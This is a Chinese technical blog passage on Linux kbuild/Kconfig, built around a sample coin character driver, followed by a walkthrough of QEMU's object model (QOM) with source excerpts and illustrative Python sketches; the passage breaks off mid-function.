<p>下面对这四个部分进行详细介绍。</p>
<h3><b> Configuration Symbols </b></h3>
<p>Configuration Symbols用来决定哪些特性或者模块将会被编译进内核。最常见的是两种编译选项,boolean和tristate,其不同之处只是可以取的值不同。boolean symbols可以取两种值:true/false,就是开关。tristate可以取三种值,yes/no/module。</p>
<p>内核中的很多选项都需要一个开关,而不是module,比如对SMP或者preemption的支持,必须要在内核编译时候就决定好,这个时候就用boolean config symbol就行了。很多设备驱动可以在之后加入内核,这个时候使用tristate config symbol,决定是编译进内核呢,还是模块,还是压根就不编译。</p>
<p>其他config symbol包括strings和hex,但是这些不常用,此处从略。</p>
<h3><b> Kconfig Files </b></h3>
<p>Configuration symbols是定义在Kconfig file中的,每一个Kconfig file可以描述任意数量的symbols,也可以使用include包含其他Kconfig file。内核编译工具(如make menuconfig)读取这些文件生成一个树形结构。内核中的每一个目录都有一个Kconfig,它包含自己子目录的Kconfig file,内核根目录下也有一个Kconfig。menuconfig/gconfig就从根目录下的Kconfig开始递归读取。</p>
<p>下面是arch/x86下的Kconfig节选:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Select 32 or 64 bit
config 64BIT
	bool "64-bit kernel" if ARCH = "x86"
	default ARCH != "i386"
	---help---
	  Say yes to build a 64-bit kernel - formerly known as x86_64
	  Say no to build a 32-bit kernel - formerly known as i386

config X86_32
	def_bool y
	depends on !64BIT

	# Options that are inherently 32-bit kernel only:
	select ARCH_WANT_IPC_PARSE_VERSION
	select CLKSRC_I8253
	select CLONE_BACKWARDS
	select HAVE_AOUT
	select HAVE_GENERIC_DMA_COHERENT
	select MODULES_USE_ELF_REL
	select OLD_SIGACTION
</code></pre></div></div>
<h3><b> .config file </b></h3>
<p>所有的config symbol值都保存在.config文件中,每一次执行menuconfig都会将变化写入该文件。.config是一个文本文件,可以直接手动修改。文件中每一行表示一个config symbol的值,没有选中的symbol会被注释掉。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CONFIG_KVM_AMD=m
# CONFIG_KVM_MMU_AUDIT is not set
CONFIG_KVM_DEVICE_ASSIGNMENT=y
CONFIG_VHOST_NET=m
</code></pre></div></div>
<h3><b> Makefiles </b></h3>
<p>Makefiles用来编译内核和模块,与Kconfig类似,每一个子目录都会有一个Makefile文件,
用来编译其下的文件。整个编译过程也是递归的,上一层的Makefile下降到子目录中,
然后编译。</p>
<h2 id="第三节"> 实例 </h2>
<p>本节中实现一个coin driver,把上面的东西实践一下。coin driver是一个char类型的driver,每次读随机返回正反面(tail/head),并且有一个统计次数的可选项。</p>
<p>比如:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>test@ubuntu:~$ sudo cat /dev/coin
tail
test@ubuntu:~$ sudo cat /dev/coin
head
test@ubuntu:~$ sudo cat /dev/coin
head
test@ubuntu:~$ sudo cat /dev/coin
head
test@ubuntu:~$ sudo cat /dev/coin
head
test@ubuntu:~$ sudo cat /sys/kernel/debug/coin/stats
head=14 tail=12
test@ubuntu:~$
</code></pre></div></div>
<p>给内核增加一个模块,需要做三件事:</p>
<ol>
<li>把源文件放在相应的目录,比如对于wifi设备驱动就应该放在drivers/net/wireless</li>
<li>更新文件所在目录的Kconfig</li>
<li>更新文件所在的Makefile</li>
</ol>
<p>在我们的例子中,coin是一个字符设备,所以coin.c可以放在drivers/char。</p>
<p>coin可以编译到内核中,也可以编译成模块,所以COIN这个config symbol应该是一个tristate(y/n/m),COIN_STAT这个config symbol用于决定是否显示统计信息,很明显,COIN_STAT依赖于COIN,如果不定义COIN,定义COIN_STAT并没有意义。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ make menuconfig
</code></pre></div></div>
<p>我们选择将COIN设为m,COIN_STAT设为y。之后在.config之中,每个symbol名会加上一个CONFIG_前缀:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CONFIG_COIN=m
CONFIG_COIN_STAT=y
</code></pre></div></div>
<p>当编译的时候,会执行脚本读取Kconfig</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ scripts/kconfig/conf Kconfig
</code></pre></div></div>
<p>生成一个头文件include/generated/autoconf.h,其中可以看到</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define CONFIG_COIN_MODULE 1
#define CONFIG_COIN_STAT 1
</code></pre></div></div>
<p>如果将COIN定义为y,则会有如下定义</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define CONFIG_COIN 1
</code></pre></div></div>
<p>为了生成.ko,我们还需要在drivers/char/Makefile中添加如下内容:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>obj-$(CONFIG_COIN) += coin.o
</code></pre></div></div>
<p>由于CONFIG_COIN不是y就是m,所以coin.o会被添加到obj-y或者obj-m链表中,这样例子就完成了。kbuild的编译流程可以简单地用下图表示。文末附上驱动代码,来自原文。</p>
<p><img src="/assets/img/kbuild/1.jpg" alt="" /></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/fs.h>
#include <linux/uaccess.h>
#include <linux/device.h>
#include <linux/random.h>
#include <linux/debugfs.h>

#define DEVNAME "coin"
#define LEN 20
enum values {HEAD, TAIL};

struct dentry *dir, *file;
int file_value;
int stats[2] = {0, 0};
char *msg[2] = {"head\n", "tail\n"};
static int major;
static struct class *class_coin;
static struct device *dev_coin;

static ssize_t r_coin(struct file *f, char __user *b,
                      size_t cnt, loff_t *lf)
{
    char *ret;
    u32 value = prandom_u32() % 2;

    ret = msg[value];
    stats[value]++;
    return simple_read_from_buffer(b, cnt, lf, ret, strlen(ret));
}
static struct file_operations fops = { .read = r_coin };

#ifdef CONFIG_COIN_STAT
static ssize_t r_stat(struct file *f, char __user *b,
                      size_t cnt, loff_t *lf)
{
    char buf[LEN];

    snprintf(buf, LEN, "head=%d tail=%d\n",
             stats[HEAD], stats[TAIL]);
    return simple_read_from_buffer(b, cnt, lf, buf, strlen(buf));
}
static struct file_operations fstat = { .read = r_stat };
#endif

int init_module(void)
{
    void *ptr_err;

    major = register_chrdev(0, DEVNAME, &fops);
    if (major < 0)
        return major;

    class_coin = class_create(THIS_MODULE, DEVNAME);
    if (IS_ERR(class_coin)) {
        ptr_err = class_coin;
        goto err_class;
    }

    dev_coin = device_create(class_coin, NULL,
                             MKDEV(major, 0), NULL, DEVNAME);
    if (IS_ERR(dev_coin))
        goto err_dev;

#ifdef CONFIG_COIN_STAT
    dir = debugfs_create_dir("coin", NULL);
    file = debugfs_create_file("stats", 0644,
                               dir, &file_value, &fstat);
#endif
    return 0;

err_dev:
    ptr_err = class_coin;
    class_destroy(class_coin);
err_class:
    unregister_chrdev(major, DEVNAME);
    return PTR_ERR(ptr_err);
}

void cleanup_module(void)
{
#ifdef CONFIG_COIN_STAT
    debugfs_remove(file);
    debugfs_remove(dir);
#endif
    device_destroy(class_coin, MKDEV(major, 0));
    class_destroy(class_coin);
    unregister_chrdev(major, DEVNAME);
}
MODULE_LICENSE("GPL");
</code></pre></div></div>
QOM介绍2017-01-08T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/01/08/qom-introduction
<ul>
<li><a href="#第一节">一. 模块注册</a></li>
<li><a href="#第二节">二. Class的初始化</a></li>
<li><a href="#第三节">三. Class的层次结构</a></li>
<li><a href="#第四节">四. 对象的构造</a></li>
<li><a href="#总结">五. 总结</a></li>
<li><a href="#后记">后记</a></li>
</ul>
<p>QOM全称qemu object model,顾名思义,这是对qemu中对象的一个抽象层。通过QOM可以对qemu中的各种资源进行抽象、管理。比如设备模拟中的设备创建,配置,销毁。QOM还用于各种backend的抽象,MemoryRegion,Machine等的抽象,毫不夸张的说,QOM遍布于qemu代码。本文以qemu的设备模拟为例,对QOM进行详细介绍。本文代码基于qemu-2.8。</p>
<h2 id="第一节"> 一. 模块注册 </h2>
<p>在hw文件目录下的设备模拟中,几乎所有.c文件都会有一个全局的</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>type_init(xxxxxxxxx)
</code></pre></div></div>
<p>。这就是向QOM模块注册自己,比如</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>type_init(serial_register_types)//注册serial
type_init(vmxnet3_register_types)//注册vmxnet3
</code></pre></div></div>
<p>这类似于Linux驱动模块的注册,在这里type_init是一个宏,在include/qemu/module.h中,我们看到</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define module_init(function, type)                                         \
    static void __attribute__((constructor)) do_qemu_init_ ## function(void) \
    {                                                                        \
        register_module_init(function, type);                                \
    }

typedef enum {
    MODULE_INIT_BLOCK,
    MODULE_INIT_OPTS,
    MODULE_INIT_QAPI,
    MODULE_INIT_QOM,
    MODULE_INIT_TRACE,
    MODULE_INIT_MAX
} module_init_type;
#define block_init(function) module_init(function, MODULE_INIT_BLOCK)
#define opts_init(function) module_init(function, MODULE_INIT_OPTS)
#define qapi_init(function) module_init(function, MODULE_INIT_QAPI)
#define type_init(function) module_init(function, MODULE_INIT_QOM)
#define trace_init(function) module_init(function, MODULE_INIT_TRACE)
</code></pre></div></div>
<p>这里有多个module,对于xxx_init,都是通过调用module_init来进行注册的。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void register_module_init(void (*fn)(void), module_init_type type)
{
    ModuleEntry *e;
    ModuleTypeList *l;

    e = g_malloc0(sizeof(*e));
    e->init = fn;
    e->type = type;

    l = find_type(type);
    QTAILQ_INSERT_TAIL(l, e, node);
}

static ModuleTypeList *find_type(module_init_type type)
{
    init_lists();
    return &init_type_list[type];
}

static ModuleTypeList init_type_list[MODULE_INIT_MAX];
</code></pre></div></div>
<p>这样一看就比较清楚了,init_type_list作为全局的list数组,所有通过type_init注册的对象就会被放连接在init_type_list[MODULE_INIT_QOM]这个list上。这个过程可以用如下图表示。</p>
<p><img src="/assets/img/qom/1.png" alt="" /></p>
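<p>这种"先把init函数挂到链表上、之后再统一调用"的机制,可以用一小段Python代码来模拟(仅为示意,与QEMU的真实实现无关,函数名只是沿用QEMU的叫法):</p>

```python
# 模拟 register_module_init / module_call_init 的注册-调用机制(示意代码)
MODULE_INIT_QOM = "qom"

init_type_list = {}          # 类比 QEMU 中全局的 init_type_list[] 数组

def register_module_init(fn, type_):
    # 把 init 函数挂到对应类型的链表尾部
    init_type_list.setdefault(type_, []).append(fn)

def module_call_init(type_):
    # 依次调用该类型链表上注册的所有 init 函数
    for fn in init_type_list.get(type_, []):
        fn()

called = []
register_module_init(lambda: called.append("serial"), MODULE_INIT_QOM)
register_module_init(lambda: called.append("vmxnet3"), MODULE_INIT_QOM)
module_call_init(MODULE_INIT_QOM)
print(called)                # ['serial', 'vmxnet3']
```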
<p>我们注意到module_init的定义</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define module_init(function, type)                                         \
    static void __attribute__((constructor)) do_qemu_init_ ## function(void) \
    {                                                                        \
        register_module_init(function, type);                                \
    }
</code></pre></div></div>
<p>所以每一个type_init都会是一个函数do_qemu_init_xxxx,比如type_init(serial_register_types)将会被展开成</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void __attribute__((constructor)) do_qemu_init_serial_register_types(void)
{
    register_module_init(serial_register_types, MODULE_INIT_QOM);
}
</code></pre></div></div>
<p>从constructor属性看,这将会使得该函数在main之前执行。</p>
<p>所以在qemu的main函数执行之前,图1中的各种链表已经准备好了。
在main函数中,我们可以看到,很快就调用了</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>module_call_init(MODULE_INIT_QOM);
</code></pre></div></div>
<p>看module_call_init定义,</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void module_call_init(module_init_type type)
{
    ModuleTypeList *l;
    ModuleEntry *e;

    l = find_type(type);

    QTAILQ_FOREACH(e, l, node) {
        e->init();
    }
}
</code></pre></div></div>
<p>可以看到该函数就是简单调用了注册在其上面的init函数,以serial举例:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void serial_register_types(void)
{
    type_register_static(&serial_isa_info);
}

type_init(serial_register_types)
</code></pre></div></div>
<p>这里就会调用serial_register_types,这个函数以serial_isa_info为参数调用了type_register_static,函数调用链如下</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>type_register_static->type_register->type_register_internal->type_new
</code></pre></div></div>
<p>这一过程的目的就是利用TypeInfo构造出一个TypeImpl结构,之后插入到一个哈希表之中。这个哈希表以ti->name(也就是info->name)为key,value就是根据TypeInfo生成的TypeImpl。这样,在module_call_init(MODULE_INIT_QOM)调用之后,就有了一个type的哈希表,里面保存了所有的类型信息。</p>
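<p>这个type哈希表的效果可以用Python的dict来类比(仅为示意,这里直接用dict代表TypeImpl,真实代码中会从TypeInfo拷贝各个字段):</p>

```python
# 类比 QEMU 的 type 哈希表:key 是 TypeInfo.name,value 是生成的 TypeImpl
type_table = {}

def type_register(info):
    ti = dict(info)              # 示意:由 TypeInfo 构造 TypeImpl
    type_table[ti["name"]] = ti  # 以 name 为 key 插入哈希表
    return ti

type_register({"name": "isa-serial", "parent": "isa-device"})
type_register({"name": "isa-device", "parent": "device"})

assert type_table["isa-serial"]["parent"] == "isa-device"
```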
<h2 id="第二节">二. Class的初始化 </h2>
<p>从第一部分我们已经知道,现在已经有了一个TypeImpl的哈希表。下一步就是初始化每个type,这一步可以看成是class的初始化:每一个type对应一个class。调用链如下</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>main->select_machine->find_default_machine->object_class_get_list->object_class_foreach
</code></pre></div></div>
<p>这里是在选择机器类型的时候顺便把各个type初始化了。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void object_class_foreach(void (*fn)(ObjectClass *klass, void *opaque),
                          const char *implements_type, bool include_abstract,
                          void *opaque)
{
    OCFData data = { fn, implements_type, include_abstract, opaque };

    enumerating_types = true;
    g_hash_table_foreach(type_table_get(), object_class_foreach_tramp, &data);
    enumerating_types = false;
}
</code></pre></div></div>
<p>type_table_get就是之前创建的name为key,TypeImpl为value的哈希表。看看对这个表中的每一项调用的函数。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void object_class_foreach_tramp(gpointer key, gpointer value,
                                       gpointer opaque)
{
    OCFData *data = opaque;
    TypeImpl *type = value;
    ObjectClass *k;

    type_initialize(type);
    k = type->class;

    if (!data->include_abstract && type->abstract) {
        return;
    }
    if (data->implements_type &&
        !object_class_dynamic_cast(k, data->implements_type)) {
        return;
    }

    data->fn(k, data->opaque);
}
</code></pre></div></div>
<p>我们来看 type_initialize函数</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void type_initialize(TypeImpl *ti)
{
    TypeImpl *parent;

    if (ti->class) {
        return;
    }

    ti->class_size = type_class_get_size(ti);
    ti->instance_size = type_object_get_size(ti);

    ti->class = g_malloc0(ti->class_size);

    parent = type_get_parent(ti);
    if (parent) {
        type_initialize(parent);
        GSList *e;
        int i;

        g_assert_cmpint(parent->class_size, <=, ti->class_size);
        memcpy(ti->class, parent->class, parent->class_size);
        ti->class->interfaces = NULL;
        ti->class->properties = g_hash_table_new_full(
            g_str_hash, g_str_equal, g_free, object_property_free);

        for (e = parent->class->interfaces; e; e = e->next) {
            InterfaceClass *iface = e->data;
            ObjectClass *klass = OBJECT_CLASS(iface);

            type_initialize_interface(ti, iface->interface_type, klass->type);
        }

        for (i = 0; i < ti->num_interfaces; i++) {
            TypeImpl *t = type_get_by_name(ti->interfaces[i].typename);
            for (e = ti->class->interfaces; e; e = e->next) {
                TypeImpl *target_type = OBJECT_CLASS(e->data)->type;

                if (type_is_ancestor(target_type, t)) {
                    break;
                }
            }

            if (e) {
                continue;
            }

            type_initialize_interface(ti, t, t);
        }
    } else {
        ti->class->properties = g_hash_table_new_full(
            g_str_hash, g_str_equal, g_free, object_property_free);
    }

    ti->class->type = ti;

    while (parent) {
        if (parent->class_base_init) {
            parent->class_base_init(ti->class, ti->class_data);
        }
        parent = type_get_parent(parent);
    }

    if (ti->class_init) {
        ti->class_init(ti->class, ti->class_data);
    }
}
</code></pre></div></div>
<p>开头我们可以看到,如果ti->class已经存在,说明该type已经初始化过了,直接返回;如果有parent,则会递归调用type_initialize,即先初始化父type。</p>
<p>这里我们看到type也有一个层次关系,即QOM 对象的层次结构。在serial_isa_info
结构的定义中,我们可以看到有一个.parent域,</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const TypeInfo serial_isa_info = {
    .name          = TYPE_ISA_SERIAL,
    .parent        = TYPE_ISA_DEVICE,
    .instance_size = sizeof(ISASerialState),
    .class_init    = serial_isa_class_initfn,
};
</code></pre></div></div>
<p>这说明TYPE_ISA_SERIAL的父type是TYPE_ISA_DEVICE,在hw/isa/isa-bus.c中可以看到isa_device_type_info的父type是TYPE_DEVICE</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const TypeInfo isa_device_type_info = {
    .name          = TYPE_ISA_DEVICE,
    .parent        = TYPE_DEVICE,
    .instance_size = sizeof(ISADevice),
    .instance_init = isa_device_init,
    .abstract      = true,
    .class_size    = sizeof(ISADeviceClass),
    .class_init    = isa_device_class_init,
};
</code></pre></div></div>
<p>依次往上溯我们可以得到这样一条type的链,</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>TYPE_ISA_SERIAL->TYPE_ISA_DEVICE->TYPE_DEVICE->TYPE_OBJECT
</code></pre></div></div>
<p>事实上,qemu中有两种根type,还有一种是TYPE_INTERFACE。</p>
<p>这样一来,各个type初始化的先后顺序就无关紧要了:不管哪个type最先初始化,最终都会递归初始化到根type object。对于object,只是简单地分配了ti->class,并设置了ti->class->type的值。如果type有interface,还需要初始化ti->class->interfaces,每一个interface也是一个type;如果父type有interfaces,还要将父type的interface添加到ti->class->interfaces上去。</p>
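<p>这种"先递归初始化父type、再把父class的内容拷贝下来、最后填充自己的字段"的过程,可以用下面的Python代码示意(仅为示意,并非真实实现):</p>

```python
# 模拟 type_initialize:父 class 先初始化,子 class 从父 class "拷贝"内容
type_table = {
    "object":     {"parent": None,     "fields": {"unparent": "object_unparent"}},
    "device":     {"parent": "object", "fields": {"realize": None}},
    "isa-device": {"parent": "device", "fields": {}},
}
classes = {}

def type_initialize(name):
    if name in classes:               # 对应 "if (ti->class) return;"
        return classes[name]
    ti = type_table[name]
    cls = {}
    if ti["parent"]:
        # 对应 memcpy(ti->class, parent->class, parent->class_size)
        cls.update(type_initialize(ti["parent"]))
    cls.update(ti["fields"])          # 对应 class_init 填充自己的字段
    classes[name] = cls
    return cls

cls = type_initialize("isa-device")
assert "unparent" in cls and "realize" in cls   # 继承了所有祖先的字段
```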
<p>之后,最重要的就是调用parent->class_base_init以及ti->class_init了,这相当于C++里面的构造基类的数据。我们以一个class_init为例,</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void serial_isa_class_initfn(ObjectClass *klass, void *data)
{
    DeviceClass *dc = DEVICE_CLASS(klass);

    dc->realize = serial_isa_realizefn;
    dc->vmsd = &vmstate_isa_serial;
    dc->props = serial_isa_properties;
    set_bit(DEVICE_CATEGORY_INPUT, dc->categories);
}
</code></pre></div></div>
<p>我们可以看到这里从ObjectClass转换成了DeviceClass,然后做了一些簿记工作。这里为什么可以做转换呢。接下来看看Class的层次结构。</p>
<h2 id="第三节">三. Class的层次结构 </h2>
<p>vmxnnet3的层次多一些,我们以他为例,首先看vmxnet3_info的定义。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const TypeInfo vmxnet3_info = {
    .name          = TYPE_VMXNET3,
    .parent        = TYPE_PCI_DEVICE,
    .class_size    = sizeof(VMXNET3Class),
    .instance_size = sizeof(VMXNET3State),
    .class_init    = vmxnet3_class_init,
    .instance_init = vmxnet3_instance_init,
};

typedef struct VMXNET3Class {
    PCIDeviceClass parent_class;
    DeviceRealize parent_dc_realize;
} VMXNET3Class;

typedef struct PCIDeviceClass {
    DeviceClass parent_class;

    void (*realize)(PCIDevice *dev, Error **errp);
    int (*init)(PCIDevice *dev); /* TODO convert to realize() and remove */
    PCIUnregisterFunc *exit;
    PCIConfigReadFunc *config_read;
    PCIConfigWriteFunc *config_write;
    ...
} PCIDeviceClass;

typedef struct DeviceClass {
    /*< private >*/
    ObjectClass parent_class;
    /*< public >*/
    ...
} DeviceClass;

struct ObjectClass
{
    /*< private >*/
    Type type;
    GSList *interfaces;

    const char *object_cast_cache[OBJECT_CLASS_CAST_CACHE];
    const char *class_cast_cache[OBJECT_CLASS_CAST_CACHE];

    ObjectUnparent *unparent;

    GHashTable *properties;
};
</code></pre></div></div>
<p>我们可以看到这样一种层次结构</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>VMXNET3Class->PCIDeviceClass->DeviceClass->ObjectClass
</code></pre></div></div>
<p>这可以看成C++中的继承关系,基类就是ObjectClass,越往下包含的数据越具体。</p>
<p>从type_initialize中,我们可以看到,调用class_init(ti->class,ti->class_data)
,这里的ti->class就是刚刚分配出来的,对应到vmxnet3,这里就是一个VMXNET3Class结构,
注意到</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>memcpy(ti->class, parent->class, parent->class_size);
</code></pre></div></div>
<p>所以VMXNET3Class中父Class的部分已经被初始化了。当进入vmxnet3_class_init之后,调用DEVICE_CLASS、PCI_DEVICE_CLASS以及VMXNET3_DEVICE_CLASS可以分别得到其基Class,类似于C++里面从派生类转换到基类。以</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PCIDeviceClass *c = PCI_DEVICE_CLASS(class);
</code></pre></div></div>
<p>这句为例,我们知道这里class是vmxnet3对应的class,即class->type->name="vmxnet3"。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define PCI_DEVICE_CLASS(klass) \
    OBJECT_CLASS_CHECK(PCIDeviceClass, (klass), TYPE_PCI_DEVICE)

#define OBJECT_CLASS_CHECK(class_type, class, name) \
    ((class_type *)object_class_dynamic_cast_assert(OBJECT_CLASS(class), (name), \
                                                    __FILE__, __LINE__, __func__))

ObjectClass *object_class_dynamic_cast_assert(ObjectClass *class,
                                              const char *typename,
                                              const char *file, int line,
                                              const char *func)
{
    ObjectClass *ret;
    ...
    ret = object_class_dynamic_cast(class, typename);
    ...
    return ret;
}

ObjectClass *object_class_dynamic_cast(ObjectClass *class,
                                       const char *typename)
{
    ObjectClass *ret = NULL;
    TypeImpl *target_type;
    TypeImpl *type;

    if (!class) {
        return NULL;
    }

    /* A simple fast path that can trigger a lot for leaf classes. */
    type = class->type;
    if (type->name == typename) {
        return class;
    }

    target_type = type_get_by_name(typename);
    if (!target_type) {
        /* target class type unknown, so fail the cast */
        return NULL;
    }

    if (type->class->interfaces &&
        ...
    } else if (type_is_ancestor(type, target_type)) {
        ret = class;
    }

    return ret;
}

static bool type_is_ancestor(TypeImpl *type, TypeImpl *target_type)
{
    assert(target_type);

    /* Check if target_type is a direct ancestor of type */
    while (type) {
        if (type == target_type) {
            return true;
        }
        type = type_get_parent(type);
    }

    return false;
}
</code></pre></div></div>
<p>最终会进入object_class_dynamic_cast函数。在该函数中,根据class对应的type以及typename对应的type,判断是否能够转换,判断的主要依据就是type_is_ancestor:它判断target_type是否是type的祖先,如果是当然可以进行转换,否则就不行。</p>
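<p>type_is_ancestor沿着parent链向上查找的逻辑,可以用几行Python示意(仅为示意):</p>

```python
# 模拟 object_class_dynamic_cast 的核心判断 type_is_ancestor:
# 沿着 parent 链向上走,看 target 是否出现在祖先中
parents = {
    "vmxnet3": "pci-device",
    "pci-device": "device",
    "device": "object",
    "object": None,
}

def type_is_ancestor(type_name, target):
    while type_name is not None:
        if type_name == target:
            return True
        type_name = parents[type_name]
    return False

assert type_is_ancestor("vmxnet3", "pci-device")       # 向基类转换,成功
assert not type_is_ancestor("pci-device", "vmxnet3")   # 反向转换,失败
```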
<p>好了,总结一下现在我们得到了什么:从最开始的TypeImpl初始化出了每一个type对应的class,并且构建好了各个Class的继承关系,如下图所示。注意下面的每个***Class都包含了上面的部分。</p>
<p><img src="/assets/img/qom/2.png" alt="" /></p>
<h2 id="第四节">四. 对象的构造</h2>
<p>我们上面已经看到了type哈希表的构造以及class的初始化,接下来讨论具体设备的创建。</p>
<p>以vmxnet3为例,我们需要在命令行指定-device vmxnet3。在main中,有这么一句话</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (qemu_opts_foreach(qemu_find_opts("device"),
device_init_func, NULL, NULL)) {
exit(1);
}
</code></pre></div></div>
<p>对参数中的device调用device_init_func函数,调用链</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>device_init_func->qdev_device_add
</code></pre></div></div>
<p>在qdev_device_add中我们可以看到这么一句话</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dev = DEVICE(object_new(driver));

DeviceState *qdev_device_add(QemuOpts *opts, Error **errp)
{
    DeviceClass *dc;
    const char *driver, *path;
    DeviceState *dev;
    BusState *bus = NULL;
    Error *err = NULL;

    driver = qemu_opt_get(opts, "driver");
    if (!driver) {
        error_setg(errp, QERR_MISSING_PARAMETER, "driver");
        return NULL;
    }

    /* find driver */
    dc = qdev_get_device_class(&driver, errp);
    if (!dc) {
        return NULL;
    }

    /* find bus */
    path = qemu_opt_get(opts, "bus");
    if (path != NULL) {
        bus = qbus_find(path, errp);
        if (!bus) {
            return NULL;
        }
        if (!object_dynamic_cast(OBJECT(bus), dc->bus_type)) {
            error_setg(errp, "Device '%s' can't go on %s bus",
                       driver, object_get_typename(OBJECT(bus)));
            return NULL;
        }
    } else if (dc->bus_type != NULL) {
        bus = qbus_find_recursive(sysbus_get_default(), NULL, dc->bus_type);
        if (!bus || qbus_is_full(bus)) {
            error_setg(errp, "No '%s' bus found for device '%s'",
                       dc->bus_type, driver);
            return NULL;
        }
    }
    if (qdev_hotplug && bus && !qbus_is_hotpluggable(bus)) {
        error_setg(errp, QERR_BUS_NO_HOTPLUG, bus->name);
        return NULL;
    }

    /* create device */
    dev = DEVICE(object_new(driver));

    if (bus) {
        qdev_set_parent_bus(dev, bus);
    }

    qdev_set_id(dev, qemu_opts_id(opts));

    /* set properties */
    if (qemu_opt_foreach(opts, set_property, dev, &err)) {
        error_propagate(errp, err);
        object_unparent(OBJECT(dev));
        object_unref(OBJECT(dev));
        return NULL;
    }

    dev->opts = opts;
    object_property_set_bool(OBJECT(dev), true, "realized", &err);
    if (err != NULL) {
        error_propagate(errp, err);
        dev->opts = NULL;
        object_unparent(OBJECT(dev));
        object_unref(OBJECT(dev));
        return NULL;
    }

    return dev;
}
</code></pre></div></div>
<p>对象的创建是通过object_new(driver)实现的,这里的driver就是设备名vmxnet3:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>object_new->object_new_with_type->object_initialize_with_type

Object *object_new_with_type(Type type)
{
    Object *obj;

    g_assert(type != NULL);
    type_initialize(type);

    obj = g_malloc(type->instance_size);
    object_initialize_with_type(obj, type->instance_size, type);
    obj->free = g_free;

    return obj;
}

static void object_init_with_type(Object *obj, TypeImpl *ti)
{
    if (type_has_parent(ti)) {
        object_init_with_type(obj, type_get_parent(ti));
    }

    if (ti->instance_init) {
        ti->instance_init(obj);
    }
}
</code></pre></div></div>
<p>从上面的函数看,object_init_with_type会先递归初始化每一个object的父object,再调用自己的instance_init函数。这里又涉及到object的继承体系。</p>
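<p>这种"父object的instance_init先于子object调用"的递归顺序,可以用下面的Python代码示意(仅为示意):</p>

```python
# 模拟 object_init_with_type:先递归调用父 type 的 instance_init,再调用自己的
parents = {
    "vmxnet3": "pci-device",
    "pci-device": "device",
    "device": "object",
    "object": None,
}
order = []

def object_init_with_type(name):
    if parents[name] is not None:
        object_init_with_type(parents[name])
    order.append(name)          # 对应调用 ti->instance_init(obj)

object_init_with_type("vmxnet3")
print(order)                    # ['object', 'device', 'pci-device', 'vmxnet3']
```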
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>typedef struct {
    PCIDevice parent_obj;
    ...
} VMXNET3State;

struct PCIDevice {
    DeviceState qdev;
    ...
};

struct DeviceState {
    /*< private >*/
    Object parent_obj;
    /*< public >*/
};

struct Object
{
    /*< private >*/
    ObjectClass *class;
    ObjectFree *free;
    GHashTable *properties;
    uint32_t ref;
    Object *parent;
};
</code></pre></div></div>
<p>这次的继承体系是</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>VMXNET3State->PCIDevice->DeviceState->Object
</code></pre></div></div>
<p>这样就创建好了一个DeviceState(其实也是VMXNET3State),并且每一个父object的instance_init函数都已经调用过了。下面看看Object、DeviceState、PCIDevice对应的instance_init函数都做了什么:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void object_instance_init(Object *obj)
{
    object_property_add_str(obj, "type", qdev_get_type, NULL, NULL);
}

static void device_initfn(Object *obj)
{
    DeviceState *dev = DEVICE(obj);
    ObjectClass *class;
    Property *prop;

    if (qdev_hotplug) {
        dev->hotplugged = 1;
        qdev_hot_added = true;
    }

    dev->instance_id_alias = -1;
    dev->realized = false;

